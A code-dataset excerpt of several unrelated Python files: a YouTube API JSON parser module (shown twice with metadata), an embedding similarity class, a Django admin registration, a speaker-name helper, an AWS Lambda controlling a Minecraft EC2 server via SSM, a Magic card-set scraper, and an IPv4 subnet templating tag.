"publish_date" : publish_date,
"collection_date" : datetime.datetime.now()
}
def parse_channel_metadata(item):
'''
Parses and processes raw output and returns channel_id, title, account_creatation_date, keywords, description, view_count, video_count, subscription_count, playlist_id_likes, playlist_id_uploads, topic_ids, country, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
topic = item.get('topicDetails')
if topic:
topic = '|'.join(topic.get('topicCategories'))
channel_meta = {
"channel_id" : item['id'],
"title" : item["snippet"].get("title"),
"account_creation_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"keywords" : item['brandingSettings']['channel'].get('keywords'),
"description" : item["snippet"].get("description"),
"view_count" : item["statistics"].get("viewCount"),
"video_count" : item["statistics"].get("videoCount"),
"subscription_count" : item["statistics"].get("subscriberCount"),
"playlist_id_likes" : item['contentDetails']['relatedPlaylists'].get('likes'),
"playlist_id_uploads" : item['contentDetails']['relatedPlaylists'].get('uploads'),
"topic_ids" : topic,
"country" : item['snippet'].get('country'),
"collection_date" : datetime.datetime.now()
}
return channel_meta
def parse_subscription_descriptive(item):
'''
Parses and processes raw output and returns subscription_title, subscription_channel_id, subscription_kind, subscription_publish_date, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
sub_meta = {
"subscription_title" : item['snippet']['title'],
"subscription_channel_id" : item['snippet']['resourceId'].get('channelId'),
"subscription_kind" : item['snippet']['resourceId'].get('kind'),
"subscription_publish_date" : parse_yt_datetime(item['snippet'].get('publishedAt')),
"collection_date" : datetime.datetime.now()
}
return sub_meta
def parse_featured_channels(item):
'''
Parses and processes raw output and returns a dictionary where the key is the channel_id and the key is a list of channel URLs.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
d = {}
d[item['id']] = item['brandingSettings']['channel'].get('featuredChannelsUrls', [])
return d
def parse_playlist_metadata(item):
'''
Parses and processes raw output and returns playlist_name, playlist_id, playlist_publish_date, playlist_n_videos, channel_id, channel_name, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
playlist_meta = {
"playlist_name" : item['snippet'].get('title'),
"playlist_id" : item['id'],
"playlist_publish_date" : parse_yt_datetime(item['snippet'].get('publishedAt')),
"playlist_n_videos" : item['contentDetails'].get('itemCount'),
"channel_id" : item['snippet'].get('channelId'),
"channel_name" : item['snippet'].get('channelTitle'),
"collection_date" : datetime.datetime.now()
}
return playlist_meta
def parse_comment_metadata(item):
'''
Parses and processes raw output and returns video_id, commenter_channel_url, commenter_channel_display_name, comment_id, comment_like_count, comment_publish_date, text, commenter_rating, comment_parent_id, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
if item['snippet'].get('topLevelComment'):
save = item['snippet']
item = item['snippet']['topLevelComment']
comment_meta = {
"video_id" : item["snippet"].get("videoId"),
"commenter_channel_url" : item["snippet"].get("authorChannelUrl"),
"commenter_channel_id" : item['snippet'].get('authorChannelId').get('value', None),
"commenter_channel_display_name" : item['snippet'].get('authorDisplayName'),
"comment_id" : item.get("id"),
"comment_like_count" : item["snippet"].get("likeCount"),
"comment_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"text" : item["snippet"].get("textDisplay"),
"commenter_rating" : item["snippet"].get("viewerRating"),
"comment_parent_id" : item["snippet"].get("parentId"),
"collection_date" : datetime.datetime.now()
}
try:
comment_meta['reply_count'] = save.get('totalReplyCount')
except:
comment_meta['reply_count'] = item.get('totalReplyCount')
return comment_meta
def parse_rec_video_metadata(item):
'''
Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_thumbnail, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
video_meta = {
"video_id" : item['id'].get('videoId'),
"channel_title" : item["snippet"].get("channelTitle"),
"channel_id" : item["snippet"].get("channelId"),
"video_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"video_title" : item["snippet"].get("title"),
"video_description" : item["snippet"].get("description"),
"video_category" : item["snippet"].get("categoryId"),
"video_thumbnail" : item["snippet"]["thumbnails"]["high"]["url"],
"collection_date" : datetime.datetime.now()
}
return video_meta
def parse_caption_track(item):
'''
Returns the video_id, captions and collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
#TODO: convert known errors into an error message.
caption_meta = {
"video_id" : item['video_id'],
"caption" : item['caption'],
"collection_date" : item['collection_date']
}
return caption_meta
|
import json
import sys
import datetime
from collections import OrderedDict
if sys.version_info[0] == 2:
from collections import Iterable
else:
from collections.abc import Iterable
from youtube_api.youtube_api_utils import parse_yt_datetime
"""
This script contains the parsers for the raw json responses
from the API. Use `raw_json` to return the output as-is.
"""
__all__ = ['raw_json',
'parse_video_metadata',
'parse_channel_metadata',
'parse_rec_video_metadata',
'parse_video_url',
'parse_subscription_descriptive',
'parse_featured_channels',
'parse_comment_metadata',
'parse_playlist_metadata',
'parse_caption_track']
def raw_json(item):
'''
Returns the raw json output from the API.
'''
return item
def raw_json_with_datetime(item):
'''
Returns the raw json output from the API.
'''
item['collection_date'] = datetime.datetime.now().strftime('%Y-%m-%d')
return item
def parse_video_metadata(item):
'''
Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_view_count, video_comment_count, video_like_count, video_dislike_count, video_thumbnail, video_tags, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
tags = item["snippet"].get('tags')
if isinstance(tags, Iterable):
video_tags = '|'.join(tags)
else:
video_tags = ''
video_meta = {
"video_id" : item['id'],
"channel_title" : item["snippet"].get("channelTitle"),
"channel_id" : item["snippet"].get("channelId"),
"video_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"video_title" : item["snippet"].get("title"),
"video_description" : item["snippet"].get("description"),
"video_category" : item["snippet"].get("categoryId"),
"video_view_count" : item["statistics"].get("viewCount"),
"video_comment_count" : item["statistics"].get("commentCount"),
"video_like_count" : item["statistics"].get("likeCount"),
"video_dislike_count" : item["statistics"].get("dislikeCount"),
"duration" : item["contentDetails"]["duration"],
"video_thumbnail" : item["snippet"]["thumbnails"]["high"]["url"],
"video_tags" : video_tags,
"collection_date" : datetime.datetime.now()
}
return video_meta
def parse_video_url(item):
'''
Parses and processes raw output and returns publish_date, video_id, channel_id, collection_date
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
publish_date = item['snippet'].get('publishedAt')
publish_date = parse_yt_datetime(publish_date)
video_id = item['snippet']['resourceId'].get('videoId')
channel_id = item['snippet'].get('channelId')
return {
"video_id" : video_id,
"channel_id" : channel_id,
"publish_date" : publish_date,
"collection_date" : datetime.datetime.now()
}
def parse_channel_metadata(item):
'''
Parses and processes raw output and returns channel_id, title, account_creatation_date, keywords, description, view_count, video_count, subscription_count, playlist_id_likes, playlist_id_uploads, topic_ids, country, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
topic = item.get('topicDetails')
if topic:
topic = '|'.join(topic.get('topicCategories'))
channel_meta = {
"channel_id" : item['id'],
"title" : item["snippet"].get("title"),
"account_creation_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"keywords" : item['brandingSettings']['channel'].get('keywords'),
"description" : item["snippet"].get("description"),
"view_count" : item["statistics"].get("viewCount"),
"video_count" : item["statistics"].get("videoCount"),
"subscription_count" : item["statistics"].get("subscriberCount"),
"playlist_id_likes" : item['contentDetails']['relatedPlaylists'].get('likes'),
"playlist_id_uploads" : item['contentDetails']['relatedPlaylists'].get('uploads'),
"topic_ids" : topic,
"country" : item['snippet'].get('country'),
"collection_date" : datetime.datetime.now()
}
return channel_meta
def parse_subscription_descriptive(item):
'''
Parses and processes raw output and returns subscription_title, subscription_channel_id, subscription_kind, subscription_publish_date, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
sub_meta = {
"subscription_title" : item['snippet']['title'],
"subscription_channel_id" : item['snippet']['resourceId'].get('channelId'),
"subscription_kind" : item['snippet']['resourceId'].get('kind'),
"subscription_publish_date" : parse_yt_datetime(item['snippet'].get('publishedAt')),
"collection_date" : datetime.datetime.now()
}
return sub_meta
def parse_featured_channels(item):
'''
Parses and processes raw output and returns a dictionary where the key is the channel_id and the key is a list of channel URLs.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
d = {}
d[item['id']] = item['brandingSettings']['channel'].get('featuredChannelsUrls', [])
return d
def parse_playlist_metadata(item):
'''
Parses and processes raw output and returns playlist_name, playlist_id, playlist_publish_date, playlist_n_videos, channel_id, channel_name, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
playlist_meta = {
"playlist_name" : item['snippet'].get('title'),
"playlist_id" : item['id'],
"playlist_publish_date" : parse_yt_datetime(item['snippet'].get('publishedAt')),
"playlist_n_videos" : item['contentDetails'].get('itemCount'),
"channel_id" : item['snippet'].get('channelId'),
"channel_name" : item['snippet'].get('channelTitle'),
"collection_date" : datetime.datetime.now()
}
return playlist_meta
def parse_comment_metadata(item):
'''
Parses and processes raw output and returns video_id, commenter_channel_url, commenter_channel_display_name, comment_id, comment_like_count, comment_publish_date, text, commenter_rating, comment_parent_id, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
if item['snippet'].get('topLevelComment'):
save = item['snippet']
item = item['snippet']['topLevelComment']
comment_meta = {
"video_id" : item["snippet"].get("videoId"),
"commenter_channel_url" : item["snippet"].get("authorChannelUrl"),
"commenter_channel_id" : item['snippet'].get('authorChannelId').get('value', None),
"commenter_channel_display_name" : item['snippet'].get('authorDisplayName'),
"comment_id" : item.get("id"),
"comment_like_count" : item["snippet"].get("likeCount"),
"comment_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"text" : item["snippet"].get("textDisplay"),
"commenter_rating" : item["snippet"].get("viewerRating"),
"comment_parent_id" : item["snippet"].get("parentId"),
"collection_date" : datetime.datetime.now()
}
try:
comment_meta['reply_count'] = save.get('totalReplyCount')
except:
comment_meta['reply_count'] = item.get('totalReplyCount')
return comment_meta
def parse_rec_video_metadata(item):
'''
Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_thumbnail, collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
if not isinstance(item, dict):
return dict()
video_meta = {
"video_id" : item['id'].get('videoId'),
"channel_title" : item["snippet"].get("channelTitle"),
"channel_id" : item["snippet"].get("channelId"),
"video_publish_date" : parse_yt_datetime(item["snippet"].get("publishedAt")),
"video_title" : item["snippet"].get("title"),
"video_description" : item["snippet"].get("description"),
"video_category" : item["snippet"].get("categoryId"),
"video_thumbnail" : item["snippet"]["thumbnails"]["high"]["url"],
"collection_date" : datetime.datetime.now()
}
return video_meta
def parse_caption_track(item):
'''
Returns the video_id, captions and collection_date.
:params item: json document
:type item: dict
:returns: parsed dictionary
:rtype: dict
'''
#TODO: convert known errors into an error message.
caption_meta = {
"video_id" : item['video_id'],
"caption" : item['caption'],
"collection_date" : item['collection_date']
}
return caption_meta
|
en
| 0.453442
|
This script contains the parsers for the raw json responses from the API. Use `raw_json` to return the output as-is. Returns the raw json output from the API. Returns the raw json output from the API. Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_view_count, video_comment_count, video_like_count, video_dislike_count, video_thumbnail, video_tags, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns publish_date, video_id, channel_id, collection_date :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns channel_id, title, account_creatation_date, keywords, description, view_count, video_count, subscription_count, playlist_id_likes, playlist_id_uploads, topic_ids, country, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns subscription_title, subscription_channel_id, subscription_kind, subscription_publish_date, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns a dictionary where the key is the channel_id and the key is a list of channel URLs. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns playlist_name, playlist_id, playlist_publish_date, playlist_n_videos, channel_id, channel_name, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns video_id, commenter_channel_url, commenter_channel_display_name, comment_id, comment_like_count, comment_publish_date, text, commenter_rating, comment_parent_id, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Parses and processes raw output and returns video_id, channel_title, channel_id, video_publish_date, video_title, video_description, video_category, video_thumbnail, collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict Returns the video_id, captions and collection_date. :params item: json document :type item: dict :returns: parsed dictionary :rtype: dict #TODO: convert known errors into an error message.
| 3.189533
| 3
|
rec/online/datastructer/Embedding.py
|
nbsps/SilvensnRecSys
| 1
|
6628098
|
from math import sqrt
from typing import List
class Embedding:
def __init__(self, embVector: List[float]=[]):
self.embVector: List[float] = embVector
def addElem(self, elem: float):
self.embVector.insert(elem)
def getEmbVector(self):
return self.embVector
def calculateSimilarity(self, anotherEmb) -> float:
if(self.embVector is None or anotherEmb is None or anotherEmb.getEmbVector() or
len(self.embVector) != len(anotherEmb.size())):
return -1
dotProduct = 0
denominator1 = 0
denominator2 = 0
for i in range(len(self.embVector)):
dotProduct += self.embVector[i] * anotherEmb[i]
denominator1 += self.embVector[i] * self.embVector[i]
denominator2 += anotherEmb[i] * anotherEmb[i]
return dotProduct / sqrt(denominator1 * denominator2)
|
from math import sqrt
from typing import List
class Embedding:
def __init__(self, embVector: List[float]=[]):
self.embVector: List[float] = embVector
def addElem(self, elem: float):
self.embVector.insert(elem)
def getEmbVector(self):
return self.embVector
def calculateSimilarity(self, anotherEmb) -> float:
if(self.embVector is None or anotherEmb is None or anotherEmb.getEmbVector() or
len(self.embVector) != len(anotherEmb.size())):
return -1
dotProduct = 0
denominator1 = 0
denominator2 = 0
for i in range(len(self.embVector)):
dotProduct += self.embVector[i] * anotherEmb[i]
denominator1 += self.embVector[i] * self.embVector[i]
denominator2 += anotherEmb[i] * anotherEmb[i]
return dotProduct / sqrt(denominator1 * denominator2)
|
none
| 1
| 3.878644
| 4
|
|
clientes/admin.py
|
macs03/autoservicio
| 0
|
6628099
|
<reponame>macs03/autoservicio<gh_stars>0
from django.contrib import admin
from clientes.models import Clientes
# Register your models here.
admin.site.register(Clientes)
|
from django.contrib import admin
from clientes.models import Clientes
# Register your models here.
admin.site.register(Clientes)
|
en
| 0.968259
|
# Register your models here.
| 1.312581
| 1
|
src/preprocessing2/preprocess_speakers.py
|
norikinishida/discourse-parsing
| 2
|
6628100
|
SPEAKERS = [
"Alex", "Bruce", "Chris", "David", "Elliott", "Fred", "George",
"Henry", "Isaac", "John", "Kim", "Lee", "Mick", "Nicolas",
"Owen", "Patrick", "Richard", "Scott", "Tom"]
def rename_speaker_names(tokens, speaker_name_to_id_uncased):
"""
Parameters
----------
tokens: list[str]
speaker_name_to_id_uncased: dict[str, int]
Returns
-------
list[str]
"""
new_tokens = []
for token in tokens:
token_uncased = token.lower()
if token_uncased in speaker_name_to_id_uncased:
token = SPEAKERS[speaker_name_to_id_uncased[token_uncased]]
new_tokens.append(token)
return new_tokens
|
SPEAKERS = [
"Alex", "Bruce", "Chris", "David", "Elliott", "Fred", "George",
"Henry", "Isaac", "John", "Kim", "Lee", "Mick", "Nicolas",
"Owen", "Patrick", "Richard", "Scott", "Tom"]
def rename_speaker_names(tokens, speaker_name_to_id_uncased):
"""
Parameters
----------
tokens: list[str]
speaker_name_to_id_uncased: dict[str, int]
Returns
-------
list[str]
"""
new_tokens = []
for token in tokens:
token_uncased = token.lower()
if token_uncased in speaker_name_to_id_uncased:
token = SPEAKERS[speaker_name_to_id_uncased[token_uncased]]
new_tokens.append(token)
return new_tokens
|
en
| 0.132038
|
Parameters ---------- tokens: list[str] speaker_name_to_id_uncased: dict[str, int] Returns ------- list[str]
| 3.486684
| 3
|
lambda/command.py
|
jchrisfarris/minecraft
| 3
|
6628101
|
<reponame>jchrisfarris/minecraft
import json
import boto3
from botocore.exceptions import ClientError
import sys
import os
import logging
logger = logging.getLogger()
logger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def lambda_handler(event, context):
# logger.debug("Received event: " + json.dumps(event, sort_keys=True))
# message = json.loads(event['Records'][0]['Sns']['Message'])
message = event
logger.info("Received message: " + json.dumps(message, sort_keys=True))
client = boto3.client('ec2')
instance_id = os.environ['INSTANCE_ID']
if message['command'] == "stop":
# TODO Make this an cleaner SSM shutdown command
logger.info(f"Stopping Instance {os.environ['INSTANCE_ID']}")
command = "shutdown_minecraft.sh"
response = ssm_send_command(command)
logger.debug(response)
elif message['command'] == "restart":
# TODO Make this an cleaner SSM shutdown command
logger.info(f"Restarting Minecraft on Instance {os.environ['INSTANCE_ID']}")
command = "restart_minecraft.sh"
response = ssm_send_command(command)
logger.debug(response)
elif message['command'] == "start":
logger.info(f"Starting Instance {os.environ['INSTANCE_ID']}")
response = client.start_instances(InstanceIds=[instance_id])
logger.debug(response)
else:
logger.error(f"Invalid Command {message['command']}")
### End Of Function ###
def ssm_send_command(command):
client = boto3.client('ssm')
response = client.send_command(
InstanceIds=[os.environ['INSTANCE_ID']],
DocumentName=os.environ['EXECSCRIPT'],
DocumentVersion='$LATEST',
TimeoutSeconds=600,
Parameters={
'Command': [command]
},
OutputS3BucketName=os.environ['BUCKET'],
OutputS3KeyPrefix='ssm_commands',
MaxConcurrency='50',
MaxErrors='0',
CloudWatchOutputConfig={
'CloudWatchOutputEnabled': False
}
)
return(response)
|
import json
import boto3
from botocore.exceptions import ClientError
import sys
import os
import logging
logger = logging.getLogger()
logger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('urllib3').setLevel(logging.WARNING)
def lambda_handler(event, context):
# logger.debug("Received event: " + json.dumps(event, sort_keys=True))
# message = json.loads(event['Records'][0]['Sns']['Message'])
message = event
logger.info("Received message: " + json.dumps(message, sort_keys=True))
client = boto3.client('ec2')
instance_id = os.environ['INSTANCE_ID']
if message['command'] == "stop":
# TODO Make this an cleaner SSM shutdown command
logger.info(f"Stopping Instance {os.environ['INSTANCE_ID']}")
command = "shutdown_minecraft.sh"
response = ssm_send_command(command)
logger.debug(response)
elif message['command'] == "restart":
# TODO Make this an cleaner SSM shutdown command
logger.info(f"Restarting Minecraft on Instance {os.environ['INSTANCE_ID']}")
command = "restart_minecraft.sh"
response = ssm_send_command(command)
logger.debug(response)
elif message['command'] == "start":
logger.info(f"Starting Instance {os.environ['INSTANCE_ID']}")
response = client.start_instances(InstanceIds=[instance_id])
logger.debug(response)
else:
logger.error(f"Invalid Command {message['command']}")
### End Of Function ###
def ssm_send_command(command):
client = boto3.client('ssm')
response = client.send_command(
InstanceIds=[os.environ['INSTANCE_ID']],
DocumentName=os.environ['EXECSCRIPT'],
DocumentVersion='$LATEST',
TimeoutSeconds=600,
Parameters={
'Command': [command]
},
OutputS3BucketName=os.environ['BUCKET'],
OutputS3KeyPrefix='ssm_commands',
MaxConcurrency='50',
MaxErrors='0',
CloudWatchOutputConfig={
'CloudWatchOutputEnabled': False
}
)
return(response)
|
en
| 0.460876
|
# logger.debug("Received event: " + json.dumps(event, sort_keys=True)) # message = json.loads(event['Records'][0]['Sns']['Message']) # TODO Make this an cleaner SSM shutdown command # TODO Make this an cleaner SSM shutdown command ### End Of Function ###
| 2.322507
| 2
|
scan_set.py
|
bransorem/Magic-Scraper
| 2
|
6628102
|
# scan_set.py
# Scan Gatherer to find out which cards are in a set, and create a list of
# multiverse ids for those cards.
# Lists of ids are stored in ids/FOO.txt, where FOO is the short code for an
# expansion set (see sets.py).
import os
import re
import sys
import urllib
#
import sets
import tools
SEARCH_URL = "http://gatherer.wizards.com/Pages/Search/Default.aspx?"\
"page=%(page)s&set=%%5B%%22%(escaped_set_name)s%%22%%5D"\
"&special=true"
#URL_RE = re.compile(r"../Card/Details\.aspx\?multiverseid=(\d+)")
URL_RE = re.compile(r"../../Handlers/Image\.ashx\?multiverseid=(\d+)")
# only pick up cards that have their image shown
ALT_VERSION_RE = \
r"../Card/Details\.aspx\?multiverseid=(\d+)\"><img[^>]+set={0}&.*?>"
class ScannerError(Exception): pass
def scan_set(short_set):
""" Fetch and scan search result pages for the given set until we don't
find any more new cards. Return a list of card ids. """
try:
full_set_name = sets.set_info[short_set].name
except KeyError:
raise ScannerError("Unknown set code: %s" % short_set)
escaped_set_name = urllib.quote(full_set_name)
ids = []
page = 0
print "Scanning cards for set: %s (%s)" % (short_set, full_set_name)
while True:
print "Fetching search results, page", page, "..."
html = grab_page(page, escaped_set_name)
new_ids = scan_page(html, short_set)
old_length = len(ids)
for new_id in new_ids:
if new_id not in ids:
ids.append(new_id)
if old_length == len(ids):
break # no new cards found, we're done
else:
page += 1
if len(ids) != sets.set_info[short_set].cards:
print "WARNING: Expected %d cards, got %d instead" % (
sets.set_info[short_set].cards, len(ids))
print "Done;", len(ids), "found"
return ids
def grab_page(page, escaped_set_name):
url = SEARCH_URL % locals()
return tools.grab_url(url)
def scan_page(html, short_set):
""" Scan the given HTML for URLs to cards, collect their ids, and return
these ids. """
ids = []
for match in URL_RE.finditer(html):
id = match.group(1)
ids.append(id)
# try to find alternate versions (basic lands etc)
set_re = re.compile(ALT_VERSION_RE.replace('{0}', short_set))
for match in set_re.finditer(html):
id = match.group(1)
ids.append(id)
# to make things difficult, some sets use aliases here, e.g. 'OD' instead
# of 'ODY', etc
alias = sets.set_info[short_set].alias # may be None
if alias:
set_re = re.compile(ALT_VERSION_RE.replace('{0}', alias))
for match in set_re.finditer(html):
id = match.group(1)
ids.append(id)
return ids
def write_ids(short_set, ids):
filename = os.path.join('ids', "%s.txt" % short_set)
if not os.path.exists('ids'): os.mkdir('ids')
f = open(filename, 'wb')
for id in ids:
print >> f, id
f.close()
if __name__ == "__main__":
for short_set in sys.argv[1:]:
ids = scan_set(short_set)
write_ids(short_set, ids)
|
# scan_set.py
# Scan Gatherer to find out which cards are in a set, and create a list of
# multiverse ids for those cards.
# Lists of ids are stored in ids/FOO.txt, where FOO is the short code for an
# expansion set (see sets.py).
import os
import re
import sys
import urllib
#
import sets
import tools
SEARCH_URL = "http://gatherer.wizards.com/Pages/Search/Default.aspx?"\
"page=%(page)s&set=%%5B%%22%(escaped_set_name)s%%22%%5D"\
"&special=true"
#URL_RE = re.compile(r"../Card/Details\.aspx\?multiverseid=(\d+)")
URL_RE = re.compile(r"../../Handlers/Image\.ashx\?multiverseid=(\d+)")
# only pick up cards that have their image shown
ALT_VERSION_RE = \
r"../Card/Details\.aspx\?multiverseid=(\d+)\"><img[^>]+set={0}&.*?>"
class ScannerError(Exception): pass
def scan_set(short_set):
""" Fetch and scan search result pages for the given set until we don't
find any more new cards. Return a list of card ids. """
try:
full_set_name = sets.set_info[short_set].name
except KeyError:
raise ScannerError("Unknown set code: %s" % short_set)
escaped_set_name = urllib.quote(full_set_name)
ids = []
page = 0
print "Scanning cards for set: %s (%s)" % (short_set, full_set_name)
while True:
print "Fetching search results, page", page, "..."
html = grab_page(page, escaped_set_name)
new_ids = scan_page(html, short_set)
old_length = len(ids)
for new_id in new_ids:
if new_id not in ids:
ids.append(new_id)
if old_length == len(ids):
break # no new cards found, we're done
else:
page += 1
if len(ids) != sets.set_info[short_set].cards:
print "WARNING: Expected %d cards, got %d instead" % (
sets.set_info[short_set].cards, len(ids))
print "Done;", len(ids), "found"
return ids
def grab_page(page, escaped_set_name):
url = SEARCH_URL % locals()
return tools.grab_url(url)
def scan_page(html, short_set):
""" Scan the given HTML for URLs to cards, collect their ids, and return
these ids. """
ids = []
for match in URL_RE.finditer(html):
id = match.group(1)
ids.append(id)
# try to find alternate versions (basic lands etc)
set_re = re.compile(ALT_VERSION_RE.replace('{0}', short_set))
for match in set_re.finditer(html):
id = match.group(1)
ids.append(id)
# to make things difficult, some sets use aliases here, e.g. 'OD' instead
# of 'ODY', etc
alias = sets.set_info[short_set].alias # may be None
if alias:
set_re = re.compile(ALT_VERSION_RE.replace('{0}', alias))
for match in set_re.finditer(html):
id = match.group(1)
ids.append(id)
return ids
def write_ids(short_set, ids):
filename = os.path.join('ids', "%s.txt" % short_set)
if not os.path.exists('ids'): os.mkdir('ids')
f = open(filename, 'wb')
for id in ids:
print >> f, id
f.close()
if __name__ == "__main__":
for short_set in sys.argv[1:]:
ids = scan_set(short_set)
write_ids(short_set, ids)
|
en
| 0.910655
|
# scan_set.py # Scan Gatherer to find out which cards are in a set, and create a list of # multiverse ids for those cards. # Lists of ids are stored in ids/FOO.txt, where FOO is the short code for an # expansion set (see sets.py). # #URL_RE = re.compile(r"../Card/Details\.aspx\?multiverseid=(\d+)") # only pick up cards that have their image shown Fetch and scan search result pages for the given set until we don't find any more new cards. Return a list of card ids. # no new cards found, we're done Scan the given HTML for URLs to cards, collect their ids, and return these ids. # try to find alternate versions (basic lands etc) # to make things difficult, some sets use aliases here, e.g. 'OD' instead # of 'ODY', etc # may be None
| 3.114717
| 3
|
templating/tag_contributions/src/main/python/jsonteng_contribs/tags/ipv4_subnet_tag.py
|
vmware/json-template-engine
| 21
|
6628103
|
<filename>templating/tag_contributions/src/main/python/jsonteng_contribs/tags/ipv4_subnet_tag.py
# Copyright 2019 VMware, Inc.
# SPDX-License-Indentifier: Apache-2.0
import ipaddress
from jsonteng.exception import TemplateEngineException
from jsonteng.tags.tag_base import TagBase
class Ipv4SubnetTag(TagBase):
"""
Divide a network into N number of subnets. Return i_th of the subnet.
"""
name = "ipv4-subnet"
def __init__(self, tag_resolver):
"""
Construct this tag.
:param tag_resolver: Tag resolver
:type tag_resolver: 'TagResolver'
"""
super().__init__(tag_resolver)
self._element_resolver = tag_resolver.get_element_resolver()
def process(self, tag_tokens, binding_data_list):
"""
Process this tag.
:param tag_tokens: Tag arguments.
:type tag_tokens: 'list'
:param binding_data_list: Binding data used during the processing.
:type binding_data_list: 'list'
:return: JSON object
:rtype: JSON object
"""
token_count = len(tag_tokens)
if token_count < 3:
raise TemplateEngineException(
"Tag \"{}\" requires 3 parameters."
" Parameters given {}".format(Ipv4SubnetTag.name, tag_tokens))
network = ipaddress.ip_network(self._element_resolver.resolve(
tag_tokens[0], binding_data_list))
subnet_count = int(self._element_resolver.resolve(
tag_tokens[1], binding_data_list))
subnet_index = int(self._element_resolver.resolve(
tag_tokens[2], binding_data_list))
base2_exp = 0
count = int(subnet_count) - 1
while count & 1:
base2_exp += 1
count = count >> 1
if count:
raise TemplateEngineException(
"Subnet count must be multiple of 2s."
" {} is given".format(subnet_count))
if base2_exp == 0:
return tag_tokens[0]
subnet_prefix = network.prefixlen + base2_exp
subnet_address = ipaddress.ip_address(
int(network.network_address)
+ (subnet_index << (32 - subnet_prefix)))
return str(subnet_address) + '/' + str(subnet_prefix)
|
<filename>templating/tag_contributions/src/main/python/jsonteng_contribs/tags/ipv4_subnet_tag.py
# Copyright 2019 VMware, Inc.
# SPDX-License-Indentifier: Apache-2.0
import ipaddress
from jsonteng.exception import TemplateEngineException
from jsonteng.tags.tag_base import TagBase
class Ipv4SubnetTag(TagBase):
"""
Divide a network into N number of subnets. Return i_th of the subnet.
"""
name = "ipv4-subnet"
def __init__(self, tag_resolver):
"""
Construct this tag.
:param tag_resolver: Tag resolver
:type tag_resolver: 'TagResolver'
"""
super().__init__(tag_resolver)
self._element_resolver = tag_resolver.get_element_resolver()
def process(self, tag_tokens, binding_data_list):
"""
Process this tag.
:param tag_tokens: Tag arguments.
:type tag_tokens: 'list'
:param binding_data_list: Binding data used during the processing.
:type binding_data_list: 'list'
:return: JSON object
:rtype: JSON object
"""
token_count = len(tag_tokens)
if token_count < 3:
raise TemplateEngineException(
"Tag \"{}\" requires 3 parameters."
" Parameters given {}".format(Ipv4SubnetTag.name, tag_tokens))
network = ipaddress.ip_network(self._element_resolver.resolve(
tag_tokens[0], binding_data_list))
subnet_count = int(self._element_resolver.resolve(
tag_tokens[1], binding_data_list))
subnet_index = int(self._element_resolver.resolve(
tag_tokens[2], binding_data_list))
base2_exp = 0
count = int(subnet_count) - 1
while count & 1:
base2_exp += 1
count = count >> 1
if count:
raise TemplateEngineException(
"Subnet count must be multiple of 2s."
" {} is given".format(subnet_count))
if base2_exp == 0:
return tag_tokens[0]
subnet_prefix = network.prefixlen + base2_exp
subnet_address = ipaddress.ip_address(
int(network.network_address)
+ (subnet_index << (32 - subnet_prefix)))
return str(subnet_address) + '/' + str(subnet_prefix)
|
en
| 0.533798
|
# Copyright 2019 VMware, Inc. # SPDX-License-Indentifier: Apache-2.0 Divide a network into N number of subnets. Return i_th of the subnet. Construct this tag. :param tag_resolver: Tag resolver :type tag_resolver: 'TagResolver' Process this tag. :param tag_tokens: Tag arguments. :type tag_tokens: 'list' :param binding_data_list: Binding data used during the processing. :type binding_data_list: 'list' :return: JSON object :rtype: JSON object
